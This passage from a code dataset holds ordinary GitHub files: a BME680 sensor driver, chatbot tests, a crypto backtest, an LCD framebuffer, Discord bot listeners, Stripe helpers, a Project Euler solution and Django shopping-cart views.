self._humidity_calibration[6]) / 100)) / 16\n var5 = ((var3 / 16384) * (var3 / 16384)) / 1024\n var6 = (var4 * var5) / 2\n calc_hum = (((var3 + var6) / 1024) * 1000) / 4096\n calc_hum /= 1000 # get back to RH\n\n if calc_hum > 100:\n calc_hum = 100\n if calc_hum < 0:\n calc_hum = 0\n return self._calibrate(self.calibrate['humidity'],calc_hum) #\n\n @property\n def altitude(self):\n \"\"\"The altitude based on current ``pressure`` vs the sea level pressure\n (``sea_level_pressure``) - which you must enter ahead of time)\"\"\"\n pressure = self.pressure # in Si units for hPascal\n pressure = 44330 * (1.0 - math.pow(pressure / self.sea_level_pressure, 0.1903)) #\n return self._calibrate(self.calibrate['altitude'],pressure) #\n\n @property\n def gas(self):\n \"\"\"The gas resistance in ohms\"\"\"\n self._perform_reading()\n var1 = (\n (1340 + (5 * self._sw_err)) * (_LOOKUP_TABLE_1[self._gas_range])\n ) / 65536\n var2 = ((self._adc_gas * 32768) - 16777216) + var1\n var3 = (_LOOKUP_TABLE_2[self._gas_range] * var1) / 512\n calc_gas_res = (var3 + (var2 / 2)) / var2\n return int(self._calibrate(self.calibrate['gas'],calc_gas_res)) #\n\n # after https://github.com/pimoroni/bme680-python/tree/master/examples # added\n # burn in and calculate baseline\n def gasBase(self, redo=False, debug=False):\n if redo: self.gas_base = None\n if not self.gas_base is None: return self.gas_base\n BURN_TIME = const(300) # 5 minutes\n if self._debug: debug = True\n if debug:\n print(\"Gas resistance burn-in max: %d minutes\" % (BURN_TIME/60))\n strt_time = time.time(); cur_time = time.time()\n data = []; prev_gas = 0\n stable = False; cnt = 0\n while cur_time - strt_time < BURN_TIME:\n cur_time = time.time()\n gas = self.gas\n if (not stable ) and abs(gas - prev_gas) < 3000:\n if cnt > 3: stable = True\n else: cnt += 1\n elif not stable: cnt = 0\n if ((self._status & 0x30) == 0x30) and stable: # STABLE+GAS VALID\n if len(data) >= 49: data.pop(0)\n data.append(gas)\n if debug: print(\"time: %dm%ds, gas: %d Ohms\" % 
(int(cur_time-strt_time)/60,int(cur_time-strt_time)%60,gas))\n                if len(data) >= 49: break\n            else:\n                if debug: print(\"time: %dm%ds: heating up %d\" % (int(cur_time-strt_time)/60,int(cur_time-strt_time)%60,gas))\n            prev_gas = gas\n            time.sleep_ms(800)\n        if len(data):\n            # average the most recent readings to get the gas baseline\n            self.gas_base = float(sum(data[-25:]))/len(data[-25:])\n            return self.gas_base\n        return None\n\n    @property\n    def AQI(self): # added\n        # calculate gas base line. Can take 5 minutes\n        if not self.gas_base:\n            if not self.gasBase(): return None\n        hum_offset = self.humidity - self.hum_base\n        gas_offset = self.gas_base - self.gas\n        if hum_offset > 0:\n            hum_score = (100-self.hum_base-hum_offset)/(100-self.hum_base)*(self.hum_weight*100)\n        else:\n            hum_score = (self.hum_base + hum_offset) / self.hum_base * (self.hum_weight * 100)\n        # Calculate gas_score as the distance from the gas_baseline.\n        if gas_offset > 0:\n            gas_score = (self.gas / self.gas_base) * (100 - (self.hum_weight * 100))\n        else:\n            gas_score = 100 - (self.hum_weight * 100)\n        # Calculate air_quality_score.\n        return hum_score + gas_score\n\n    def _perform_reading(self):\n        \"\"\"Perform a single-shot reading from the sensor and fill internal data structure for\n        calculations\"\"\"\n        # if time.monotonic() - self._last_reading < self._min_refresh_time:\n        if time.ticks_ms() < time.ticks_add(self._last_reading,self._min_refresh_time):\n            return\n\n        # set filter\n        self._write(_BME680_REG_CONFIG, [self._filter << 2])\n        # turn on temp oversample & pressure oversample\n        self._write(\n            _BME680_REG_CTRL_MEAS,\n            [(self._temp_oversample << 5) | (self._pressure_oversample << 2)],\n        )\n        # turn on humidity oversample\n        self._write(_BME680_REG_CTRL_HUM, [self._humidity_oversample])\n        # gas measurements enabled\n        self._write(_BME680_REG_CTRL_GAS, [_BME680_RUNGAS])\n\n        ctrl = self._read_byte(_BME680_REG_CTRL_MEAS)\n        ctrl = (ctrl & 0xFC) | 0x01  # enable single shot!\n        self._write(_BME680_REG_CTRL_MEAS, [ctrl])\n        new_data = False\n        while not new_data:\n            data = self._read(_BME680_REG_MEAS_STATUS, 15)\n            new_data = data[0] & 0x80 != 0\n            time.sleep_ms(5)\n        self._last_reading = time.ticks_ms() # time.monotonic()\n        self._status = data[0] & 0xF #\n\n        self._adc_pres = _read24(data[2:5]) / 16\n        self._adc_temp = _read24(data[5:8]) / 16\n        self._adc_hum = struct.unpack(\">H\", bytes(data[8:10]))[0]\n        self._adc_gas = int(struct.unpack(\">H\", bytes(data[13:15]))[0] / 64)\n        self._gas_range = data[14] & 0x0F\n        self._status |= data[14] & 0x30 # GASM VALID + HEAT STABLE mask #\n\n        var1 = (self._adc_temp / 8) - (self._temp_calibration[0] * 2)\n        var2 = (var1 * self._temp_calibration[1]) / 2048\n        var3 = ((var1 / 2) * (var1 / 2)) / 4096\n        var3 = (var3 * self._temp_calibration[2] * 16) / 16384\n        self._t_fine = int(var2 + var3)\n\n    def _read_calibration(self):\n        \"\"\"Read & save the calibration coefficients\"\"\"\n        coeff = self._read(_BME680_BME680_COEFF_ADDR1, 25)\n        coeff += self._read(_BME680_BME680_COEFF_ADDR2, 16)\n\n        coeff = list(struct.unpack(\"<hbBHhbBhhbbHhhBBBHbbbBbHhbb\", bytes(coeff[1:39])))\n        coeff = [float(i) for i in coeff]\n        # assemble the per-quantity calibration vectors in the order the\n        # compensation formulas expect\n        self._temp_calibration = [coeff[x] for x in [23, 0, 1]]\n        self._pressure_calibration = [coeff[x] for x in [3, 4, 5, 7, 8, 10, 9, 12, 13, 14]]\n        self._humidity_calibration = [coeff[x] for x in [17, 16, 18, 19, 20, 21, 22]]\n        self._gas_calibration = [coeff[x] for x in [25, 24, 26]]\n\n        # flip around H1 & H2\n        self._humidity_calibration[1] *= 16\n        self._humidity_calibration[1] += self._humidity_calibration[0] % 16\n        self._humidity_calibration[0] /= 16\n\n        self._heat_range = (self._read_byte(0x02) & 0x30) / 16\n        self._heat_val = self._read_byte(0x00)\n        self._sw_err = (self._read_byte(0x04) & 0xF0) / 16\n\n    def _read_byte(self, register):\n        \"\"\"Read a byte register value and return it\"\"\"\n        return self._read(register, 1)[0]\n\n    def _read(self, register, length):\n        \"\"\"Returns an array of 'length' bytes read from the 'register'\"\"\"\n        with self._i2c as i2c:\n            i2c.write(bytes([register & 0xFF]))\n            result = bytearray(length)\n            i2c.readinto(result)\n            if self._debug:\n                print(\"\\t$%02X => %s\" % (register, [hex(i) for i in result]))\n        return result\n\n    def _write(self, register, values):\n        \"\"\"Writes an array of bytes starting at the 'register'\"\"\"\n        buffer = bytearray(2 * len(values))\n        for i, value in enumerate(values):\n            buffer[2 * i] = register + i\n            buffer[2 * i + 1] = value\n        with self._i2c as i2c:\n            i2c.write(buffer)\n        if self._debug:\n            print(\"\\t$%02X <= %s\" % (values[0], [hex(i) for i in values[1:]]))\n\n\n# deleted class 
Adafruit_BME680_SPI(Adafruit_BME680):\n","repo_name":"teusH/MySense","sub_path":"PyCom/lib/BME680.py","file_name":"BME680.py","file_ext":"py","file_size_in_byte":17537,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"3"} +{"seq_id":"29027973567","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals\n\nfrom mock import patch\n\nfrom utils import handle_utterance, get_tickets_example\n\ntickets_jsons, tickets_text = get_tickets_example()\n\n\ndef test_get_top5_tikcets_1(uid, tg_app):\n with patch('uhura.lib.callbacks.get_top5_tickets') as m:\n m.return_value = []\n handle_utterance(tg_app, uid, 'мои тикеты', 'Тикетов нет')\n\n\ndef test_get_top5_tikcets_2(uid, tg_app):\n with patch('uhura.lib.callbacks.get_top5_tickets') as m:\n m.return_value = None\n handle_utterance(\n tg_app,\n uid,\n 'мои тикеты',\n 'У меня что-то пошло не так при запросе к стартреку... Ох, давай попробуем еще раз чуток попозже?'\n )\n\n\ndef test_get_top5_tikcets_3(uid, tg_app):\n with patch('uhura.lib.callbacks.get_top5_tickets') as m:\n m.return_value = tickets_jsons\n text = '5 последних обновленных тикетов, где ты исполнитель:\\n' + tickets_text\n handle_utterance(tg_app, uid, 'мои тикеты', text)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/tests/test_get_top5_tickets.py","file_name":"test_get_top5_tickets.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70886385683","text":"from strategy import shootingStar as ss\nfrom util import utils\nimport pickle\n\n# files are pair_wise and time_frame_wise\npairs = ['ltcusd', 'btcusd', 'xmrbtc', 'ethusd', 'ethbtc', 'etcusd', 'etcbtc', 'xrpusd']\n# run for 15m if enough time\ntime_frames = ['30m', '1h', '3h', '6h', '12h', '1D']\n\nresult = []\n\ndef get_history(file_name):\n pickle_file = open('data/'+file_name, 'rb')\n data = pickle.load(pickle_file)\n pickle_file.close()\n return data\n\nfor time_frame in time_frames:\n for pair in pairs:\n file_name = pair + '_'+ time_frame\n data = get_history(file_name)\n\n # shooting star\n for window_size in range(5, 21):\n small_body = 0.05\n while small_body <= 0.50:\n lower_wick = 0\n while lower_wick < 1.00:\n w_start = 0\n correct = 0\n identify = 0\n while w_start != data.shape[0] - 2 * window_size:\n # do this for all the strategies...\n uptrend = utils.__uptrend(data['close'][w_start: w_start + window_size].values, window_size)\n downtrend = utils.__downtrend(data['close'][w_start: w_start + window_size].values, window_size)\n\n # shooting star\n shooting_star = ss.shooting_star(data, w_start, window_size, lower_wick, small_body)\n if uptrend and shooting_star:\n # verify if it is followed by a downtrend\n downtrend = utils.__downtrend(\n data['close'][w_start + window_size + 1:w_start + 2 * window_size + 1].values, window_size)\n if downtrend:\n print('up_down')\n correct += 1\n identify += 1\n w_start += 1\n # get accuracy\n try:\n accuracy = correct * 1.0 / identify\n except:\n # trading strategy was identified 0 times.\n accuracy = -1\n # store accuracy found with current variables\n result.append([accuracy, identify, time_frame, window_size, small_body, lower_wick])\n # print(result)\n print(str(lower_wick) + ' ' + str(small_body) + ' ' + str(window_size) + ' ' + str(accuracy) + ' ' + str(identify))\n lower_wick += 0.1\n small_body += 0.05\n out = open(file_name + '_acc_shooting_star', 'wb')\n pickle.dump(result, out)\n 
out.close()","repo_name":"CryptoBullMarket/TradingStrategies","sub_path":"get_accuracy.py","file_name":"get_accuracy.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"30132877610","text":"import lm1125_charset\n\nimport sys\nimport copy\n\nif sys.version_info.major < 3:\n\tas_integer = ord\n\tinput = lambda prompt = '': raw_input(prompt).decode('utf-8')\n\tto_bytestring = lambda list: ''.join(map(chr, list))\nelse:\n\tas_integer = lambda x: x\n\tto_bytestring = lambda list: bytes(list)\n\nclass LCD_framebuffer:\n\tdef __init__(self, write, width, height):\n\t\tself.lcd_write = write\n\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.cursor_row = 0\n\t\tself.cursor_column = 0\n\n\t\tself.framebuffer = None\n\t\tself.old_framebuffer = None\n\t\t\n\t\tself.clear_screen()\n\t\tself.sync()\n\t\n\tdef clear_screen(self):\n\t\tself.framebuffer = [[0x20 for i in range(self.width)] for i in range(self.height)]\n\t\n\tdef sync(self):\n\t\t# Iterate through every line and print to screen\n\t\tfor row in range(self.height):\n\t\t\tif not self.old_framebuffer or self.framebuffer[row] != self.old_framebuffer[row]:\n\t\t\t\tself.lcd_write(to_bytestring(self.framebuffer[row]), row)\n\t\tself.old_framebuffer = copy.deepcopy(self.framebuffer)\n\n\tdef dimensions(self):\n\t\treturn (self.width, self.height)\n\t\n\tdef get_cursor(self):\n\t\treturn (self.cursor_row, self.cursor_column)\n\t\n\tdef set_cursor(self, row, column):\n\t\tif row in range(self.height) and column in range(self.width):\n\t\t\tself.cursor_row = row\n\t\t\tself.cursor_column = column\n\t\telse:\n\t\t\traise IndexError('Cursor outside of screen')\n\t\n\tdef __write_character(self, character):\n\t\t# NOTE: Character needs to be in lm1125 encoding\n\t\tif character == 10: # \\n\n\t\t\t# Special handling for newline:\n\t\t\tself.cursor_row += 1\n\t\t\tself.cursor_column = 0\n\t\telse:\n\t\t\t# Write character into the framebuffer\n\t\t\tself.framebuffer[self.cursor_row][self.cursor_column] = character\n\t\t\t# Advance the cursor\n\t\t\tself.cursor_column += 1\n\t\t\n\t\t# If cursor went past end of the line, move to new line\n\t\tif self.cursor_column >= self.width:\n\t\t\tself.cursor_row += self.cursor_column // self.width\n\t\t\tself.cursor_column = self.cursor_column % self.width\n\t\t\n\t\t# If cursor went past end of screen, scroll the screen\n\t\tif self.cursor_row >= self.height:\n\t\t\t# Last line is self.height - 1, so the line after that (where need scroll_amount = 1), is self.height\n\t\t\tscroll_amount = self.cursor_row - self.height + 1\n\t\t\t\n\t\t\tfor row in range(self.height):\n\t\t\t\tif row + scroll_amount < self.height:\n\t\t\t\t\t# There is a valid row to copy on top of this\n\t\t\t\t\tself.framebuffer[row] = self.framebuffer[row + scroll_amount]\n\t\t\t\telse:\n\t\t\t\t\t# No rows to copy, use an empty one\n\t\t\t\t\tself.framebuffer[row] = [0x20 for i in range(self.width)]\n\t\t\t\n\t\t\tself.cursor_row -= scroll_amount\n\t\n\tdef write(self, string):\n\t\tstring_encoded = lm1125_charset.encode(string)\n\t\tfor character in string_encoded:\n\t\t\tself.__write_character(as_integer(character))\n\nif __name__ == '__main__':\n\timport lcd\n\t# Assumes `lcd.write(text, row)` takes a bytestring in the lm1125 character encoding and writes it on the display in the specified row and `lcd.width()` and `lcd.height()` return its dimensions.\n\tframebuffer = LCD_framebuffer(write = lcd.write, height = lcd.height(), 
width = lcd.width())\n\n\twhile True:\n\t\ttry:\n\t\t\tcommand = input('> ')\n\t\texcept EOFError:\n\t\t\tbreak\n\n\t\tif command == 'clear':\n\t\t\tframebuffer.clear_screen()\n\t\t\tframebuffer.sync()\n\n\t\telif command == 'cursor':\n\t\t\trow, column = framebuffer.get_cursor()\n\t\t\tprint('Row: %i Column: %i' % (row, column))\n\n\t\telif command == 'dimensions':\n\t\t\twidth, height = framebuffer.dimensions()\n\t\t\tprint('Rows: %i Columns: %i' % (height, width))\n\n\t\telif command == 'help':\n\t\t\tprint(' clear - clear the screen')\n\t\t\tprint(' cursor - get cursor position')\n\t\t\tprint(' dimensions - print the dimensions of the screen')\n\t\t\tprint(' help - print this message')\n\t\t\tprint(' newline - print a newline to screen')\n\t\t\tprint(' move - move cursor')\n\t\t\tprint(' text - print text to screen')\n\t\t\tprint(' ^D - exit')\n\t\t\n\t\telif command == 'move':\n\t\t\trow = int(input('row: '))\n\t\t\tcolumn = int(input('column: '))\n\n\t\t\ttry:\n\t\t\t\tframebuffer.set_cursor(row, column)\n\t\t\texcept IndexError:\n\t\t\t\tprint('Given cursor position outside of range')\n\n\t\telif command == 'newline':\n\t\t\tframebuffer.write('\\n')\n\t\t\tframebuffer.sync()\n\n\t\telif command == 'text':\n\t\t\ttext = input('text: ')\n\t\t\tframebuffer.write(text)\n\t\t\tframebuffer.sync()\n\n\t\telse:\n\t\t\tprint('Unrecognised command \"%s\"' % command)\n","repo_name":"JuEeHa/lm1125","sub_path":"lcd_framebuffer.py","file_name":"lcd_framebuffer.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39341339343","text":"from discord.ext.bridge.core import BridgeOption\nfrom discord import NotFound, ApplicationCommandInvokeError\nfrom discord.ext import bridge\nfrom discord.ext.commands import (\n CommandNotFound,\n CommandInvokeError,\n CheckFailure,\n ConversionError\n)\nimport discord\n\nfrom utility.common import command\nfrom utility.common.errors import NaughtyError\n\nimport os\nimport logging\nimport json\nfrom urllib.parse import quote, quote_plus\n\n\nwith open('tokens.json') as file:\n tokens: dict[str, str] = json.loads(file.read())\n\ndef _parse_text(text: str) -> str:\n for value in tokens.values():\n for value in [value, quote(value), quote_plus(value)]:\n text = text.replace(value, '')\n return text\n\nasync def _parse_error(\n ctx: bridge.BridgeExtContext | bridge.BridgeApplicationContext,\n error: Exception\n) -> Exception | None:\n if isinstance(error, CommandNotFound):\n # ignores the error if it just didnt find the command\n return\n if isinstance(error, CheckFailure):\n await ctx.message.add_reaction('👎')\n return\n if isinstance(error, NaughtyError):\n return\n if isinstance(error, ConversionError):\n error = [arg for arg in error.args if not isinstance(arg, BridgeOption)]\n error = error[0] or None\n return error\n\ndef _log_error(error: Exception) -> None:\n logger = logging.getLogger(f'discord.{type(error).__name__}')\n logger.log(\n msg=str(error),\n level=logging.ERROR\n )\n\ndef create_error_embed(error):\n embed = discord.Embed(\n color=0xFF0000,\n fields=[],\n title='Something went wrong!'\n )\n error_text = _parse_text(str(error))\n embed.description = f'```{error_text[:4090]}```'\n embed.set_footer(\n icon_url='https://cdn.discordapp.com/emojis/992830317733871636.gif',\n text=type(error).__name__\n )\n return embed\n\nclass Listeners:\n \"\"\"\n All the listeners to be added to the bot\n \"\"\"\n def __init__(self, bot: bridge.Bot) -> None:\n self.bot 
= bot\n        self.logger = logging.getLogger('discord')\n\n    async def on_command_error(self, ctx: bridge.BridgeExtContext | bridge.BridgeApplicationContext, error: Exception):\n        \"\"\"\n        When a command raises an exception\n        \"\"\"\n        if isinstance(error, CommandInvokeError):\n            error = error.original\n        error = await _parse_error(ctx, error)\n        if not error:\n            return\n        _log_error(error)\n        embed = create_error_embed(error)\n        await command.respond(ctx, embed=embed)\n\n    async def on_application_command_error(self, ctx: bridge.BridgeExtContext | bridge.BridgeApplicationContext, error):\n        \"\"\"\n        When an application command raises an exception\n        \"\"\"\n        if isinstance(error, ApplicationCommandInvokeError):\n            error = error.original\n        error = await _parse_error(ctx, error)\n        if not error:\n            return\n        _log_error(error)\n\n        embed = create_error_embed(error)\n        await command.respond(ctx, embed=embed)\n\n    async def on_error(self, error, *args, **kwargs):\n        self.logger.log(\n            msg=str(error),\n            level=logging.ERROR\n        )\n\n    async def on_member_join(self, member: discord.Member):\n        try:\n            await member.send('omg hiii :3')\n        finally:\n            await member.guild.system_channel.send(f'omg hiii :3 <@{member.id}>')\n\n    async def on_ready(self):\n        \"\"\"\n        Run once the bot is ready. Clears the terminal and prints 'ready'\n        \"\"\"\n        os.system('cls' if os.name == 'nt' else 'clear')\n        print('ready')\n","repo_name":"Salabombou/koodaamos-amazing-discord-bot","sub_path":"utility/discord/listeners.py","file_name":"listeners.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21232870133","text":"#######################################\n# Helper functions for the stripe API #\n#######################################\n\nimport stripe\n\ndef createCustomer(email, token):\n    \"\"\"\n    Creates a Stripe API Customer resource\n    \"\"\"\n    customer = stripe.Customer.create(\n        email=email,\n        source=token\n    )\n\n    return customer.id\n\ndef createSubscription(customer_id, plan):\n    \"\"\"\n    Creates a Stripe API Subscription resource\n    \"\"\"\n    subscription = stripe.Subscription.create(\n        customer=customer_id,\n        items=[\n            {\n                \"plan\": plan\n            }\n        ]\n    )\n\n    return subscription.id","repo_name":"laskeym/carwash_site","sub_path":"app/lib/stripe.py","file_name":"stripe.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"72417727761","text":"# Find the sum of all the numbers that can be written as the sum of fifth powers of their digits.\n\n\nPOWERS = {\n    0: 0,\n    1: 1,\n    2: 2 ** 5,\n    3: 3 ** 5,\n    4: 4 ** 5,\n    5: 5 ** 5,\n    6: 6 ** 5,\n    7: 7 ** 5,\n    8: 8 ** 5,\n    9: 9 ** 5,\n}\n\n\ndef is_sum(n):\n    acc = 0\n    original_n = n\n\n    while n:\n        n, last_digit = divmod(n, 10)\n        acc += POWERS[last_digit]\n\n    if acc == original_n:\n        return True\n    else:\n        return False\n\n\n# Search below 10 ** (N + 1): for N = 5 even 999999 yields only 6 * 9 ** 5 = 354294, and a 7-digit number can reach at most 7 * 9 ** 5 = 413343 < 1000000, so no larger number can equal the sum of the fifth powers of its digits.\ndef sum_numbers_sum_Nth_power(N):\n    return sum([n for n in range(2, 10 ** (N + 1)) if is_sum(n)])\n\n\nif __name__ == \"__main__\":\n    print(sum_numbers_sum_Nth_power(5))\n","repo_name":"DavideFauri/euler","sub_path":"Python 3/Problem_030.py","file_name":"Problem_030.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 
+{"seq_id":"11863637703","text":"'''\r\nAuthor: Scott Field\r\nVersion: 1.00\r\nDate: 2/28/2023\r\nProgram Name: Transformers_Class_Storage\r\nProgram Purpose: Stores The Classes For The Tkinter Window For The Transformers TCG_Deck_Builder.py file\r\nThis program is called by the TranformersTCG_Deck_Builder.py file\r\n'''\r\n\r\nfrom tkinter import *\r\nfrom tkinter.ttk import *\r\nfrom Transformers_Card_Data import *\r\n\r\n\r\n#Class For Displaying Labels That Need To Store Numbers\r\nclass ThemedLabel(Label):\r\n def __init__(self,frame,text,current_number,total_number = None):\r\n #get the frame the label will deploy in\r\n self.frame = frame\r\n\r\n #get the number value that represents how much has been added\r\n self.current_number = current_number\r\n #get the number value that represents the max to be added\r\n self.total_number = total_number\r\n\r\n #convert current number to string for output\r\n self.current_string = str(current_number)\r\n #convert max number value to string for output\r\n self.total_string = str(total_number)\r\n\r\n #format the output total\r\n if (self.total_number!= None):\r\n self.total = \" \" + \"(\" + self.current_string + \"/\" + self.total_string + \")\"\r\n else:\r\n self.total = \" \" + \"(\" + self.current_string + \")\"\r\n\r\n #add the output text to class\r\n self.text = text\r\n #add the text and ouput total to the output string\r\n self.output = self.text + self.total\r\n\r\n #Inherit attributes of label\r\n Label.__init__(self,frame,text = self.output)\r\n\r\n #return the current number\r\n def getCurrentNumber(self):\r\n return self.current_number\r\n \r\n #return the total number\r\n def getTotalNumber(self):\r\n return self.total_number\r\n \r\n #return the complete text \r\n def getText(self):\r\n return self.output\r\n \r\n def setCurrentNumber(self,number):\r\n #increase current displayed number by number\r\n self.current_number = number\r\n self.current_string = str(self.current_number)\r\n #format the output total\r\n #if their is a total number set total to format 1\r\n if (self.total_number!= None):\r\n #set format 1\r\n self.total = \" \" + \"(\" + self.current_string + \"/\" + self.total_string + \")\"\r\n #if their is not a total number set total to format 2\r\n else:\r\n #set format 2\r\n self.total = \" \" + \"(\" + self.current_string + \")\"\r\n #add the output text to the current text\r\n self.output = self.text + self.total\r\n self.config(text = self.output)\r\n\r\n\r\n#Change The Colors Of All ttk buttons\r\nclass ThemedButton(Button):\r\n #initailize class\r\n def __init__(self,frame,text,Mybackground,command):\r\n self.frame = frame\r\n self.text = text\r\n #Mybackground distinguishes which background is the parameter\r\n self.background = Mybackground\r\n self.command = command\r\n #Inherit attributes of ttk.button\r\n Button.__init__(self,self.frame,text = self.text, command = self.command)\r\n\r\n #Create New Style For Button\r\n self.style = Style()\r\n #Set Style To Alternate\r\n self.style.theme_use('alt')\r\n #Configure New Style Name & Color\r\n self.style.configure('TButton', background = Mybackground)\r\n\r\n #method to change color to provided color\r\n def changeColor(self,color):\r\n #change the style\r\n self.style.configure('TButton', background = color)\r\n #map the style to the button\r\n self.style.map('TButton',background = [('active',color)])\r\n #method to change text to provided text\r\n def setText(self,newText):\r\n #configure text equal to the new text\r\n self.configure(text = 
newText)\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n","repo_name":"perspace42/Transformers-TCG-Deck-Builder","sub_path":"Transformers_Class_Storage.py","file_name":"Transformers_Class_Storage.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35078138567","text":"import os\nimport execute\n\ndef check(config_folder,junk):\n with open(os.path.join(config_folder, 'os_packages'), 'wb') as out:\n for possible in (\n 'dpkg -l',\n 'yum list',\n 'up2date --showall',\n ):\n if execute.returncode('which '+possible.split()[0])!=0:\n continue\n out.write(execute.simple(possible))\n return ''\n return 'Could not find package manager!'\n \n","repo_name":"simplistix/checker","sub_path":"checker/checkers/os_packages.py","file_name":"os_packages.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"26859206793","text":"from django.contrib import messages\r\nfrom django.shortcuts import get_object_or_404, redirect, render\r\nfrom django.urls import reverse\r\nfrom django.views import View\r\nfrom django.views.generic.detail import DetailView\r\nfrom django.views.generic.list import ListView\r\n\r\nfrom perfil.models import Perfil\r\n\r\nfrom . import models\r\n\r\n\r\nclass ListaProdutos(ListView):\r\n model = models.Produto\r\n template_name = 'produto/lista.html'\r\n context_object_name = 'produtos'\r\n paginate_by = 10\r\n\r\n\r\nclass DetalheProdutos(DetailView):\r\n model = models.Produto\r\n template_name = 'produto/detalhe.html'\r\n context_object_name = 'produto'\r\n slug_url_kwarg = 'slug'\r\n\r\n\r\nclass AdicionarAoCarinho(View):\r\n def get(self, *args, **kwargs):\r\n http_referer = self.request.META.get(\r\n 'HTTP_REFERER',\r\n reverse('produto:lista')\r\n )\r\n variacao_id = self.request.GET.get('vid')\r\n\r\n if not variacao_id:\r\n messages.error(self.request, \"Produto não existe\")\r\n\r\n return redirect(http_referer)\r\n\r\n variacao = get_object_or_404(models.Variacao, id=variacao_id)\r\n\r\n variacao_estoque = variacao.estoque\r\n\r\n produto = variacao.produto\r\n produto_id = produto.id\r\n produto_nome = produto.nome\r\n variacao_nome = variacao.name or ''\r\n preco_unitario = variacao.preco\r\n preco_unitario_promocional = variacao.preco_promocional\r\n slug = produto.slug\r\n imagem = produto.imagem\r\n\r\n if imagem:\r\n imagem = imagem.name\r\n else:\r\n imagem = ''\r\n\r\n if variacao.estoque < 1:\r\n messages.error(self.request, \"Indisponivel em Estoque\")\r\n\r\n return redirect(http_referer)\r\n\r\n if not self.request.session.get('carrinho'):\r\n self.request.session['carrinho'] = {}\r\n self.request.session.save()\r\n\r\n carrinho = self.request.session['carrinho']\r\n\r\n if variacao_id in carrinho:\r\n quantidade_carrinho = carrinho[variacao_id]['quantidade']\r\n quantidade_carrinho += 1\r\n\r\n if variacao_estoque < quantidade_carrinho:\r\n messages.warning(\r\n self.request,\r\n f'Estoque insuficiente para {quantidade_carrinho}x no'\r\n f'produto \"{produto_nome}\". 
adicionamos {variacao_estoque}'\r\n f'x \"{produto_nome}\" no seu carrinho.'\r\n )\r\n quantidade_carrinho = variacao_estoque\r\n\r\n carrinho[variacao_id]['quantidade'] = quantidade_carrinho\r\n carrinho[variacao_id]['preco_quantitativo'] = preco_unitario * \\\r\n quantidade_carrinho\r\n carrinho[variacao_id]['preco_quantitativo_promocional'] = \\\r\n preco_unitario_promocional * quantidade_carrinho\r\n\r\n else:\r\n carrinho[variacao_id] = {\r\n 'produto_id': produto_id,\r\n 'produto_nome': produto_nome,\r\n 'variacao_nome': variacao_nome,\r\n 'variacao_id': variacao_id,\r\n 'preco_unitario': preco_unitario,\r\n 'preco_unitario_promocional': preco_unitario_promocional,\r\n 'preco_quantitativo': preco_unitario,\r\n 'preco_quantitativo_promocional': preco_unitario_promocional,\r\n 'quantidade': 1,\r\n 'slug': slug,\r\n 'imagem': imagem\r\n }\r\n\r\n self.request.session.save()\r\n messages.success(\r\n self.request,\r\n f'Produto {produto_nome} {variacao_nome} adicionado ao seu '\r\n f'carrinho. x{carrinho[variacao_id][\"quantidade\"]}'\r\n )\r\n return redirect(http_referer)\r\n\r\n\r\nclass RemoverDoCarinho(View):\r\n def get(self, *args, **kwargs):\r\n\r\n http_referer = self.request.META.get(\r\n 'HTTP_REFERER',\r\n reverse('produto:lista')\r\n )\r\n variacao_id = self.request.GET.get('vid')\r\n\r\n if not variacao_id:\r\n return redirect(http_referer)\r\n\r\n if not self.request.session.get('carrinho'):\r\n return redirect(http_referer)\r\n\r\n if variacao_id not in self.request.session['carrinho']:\r\n return redirect(http_referer)\r\n\r\n carrinho = self.request.session['carrinho'][variacao_id]\r\n\r\n messages.success(\r\n self.request,\r\n f'Produto {carrinho[\"produto_nome\"]} {carrinho[\"variacao_nome\"]}'\r\n f'removido do seu carrinho.'\r\n )\r\n\r\n del self.request.session['carrinho'][variacao_id]\r\n self.request.session.save()\r\n return redirect(http_referer)\r\n\r\n\r\nclass Carrinho(View):\r\n def get(self, *args, **kwargs):\r\n contexto = {\r\n 'carrinho': self.request.session.get('carrinho')\r\n }\r\n return render(self.request, 'produto/carrinho.html', contexto)\r\n\r\n\r\nclass ResumoDaCompra(View):\r\n def get(self, *args, **kwargs):\r\n if not self.request.user.is_authenticated:\r\n messages.warning(\r\n self.request, \"Efetue o login para finalizar a compra\")\r\n return redirect('perfil:criar')\r\n\r\n perfil = Perfil.objects.filter(usuario=self.request.user)\r\n\r\n if not perfil.exists():\r\n messages.error(\r\n self.request, \"Complete o cadastro do perfil para efetua a compra\")\r\n return redirect('perfil:criar')\r\n\r\n if not self.request.session.get('carrinho'):\r\n messages.error(\r\n self.request, \"Seu carrinho esta vazio\")\r\n return redirect('produto:lista')\r\n\r\n contexto = {\r\n 'carrinho': self.request.session.get('carrinho'),\r\n 'usuario': self.request.user,\r\n 'perfil': perfil.first()\r\n\r\n }\r\n\r\n return render(self.request, 'produto/resumodacompra.html', contexto)\r\n","repo_name":"MatheusLoeblein/Ecommerce","sub_path":"produto/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 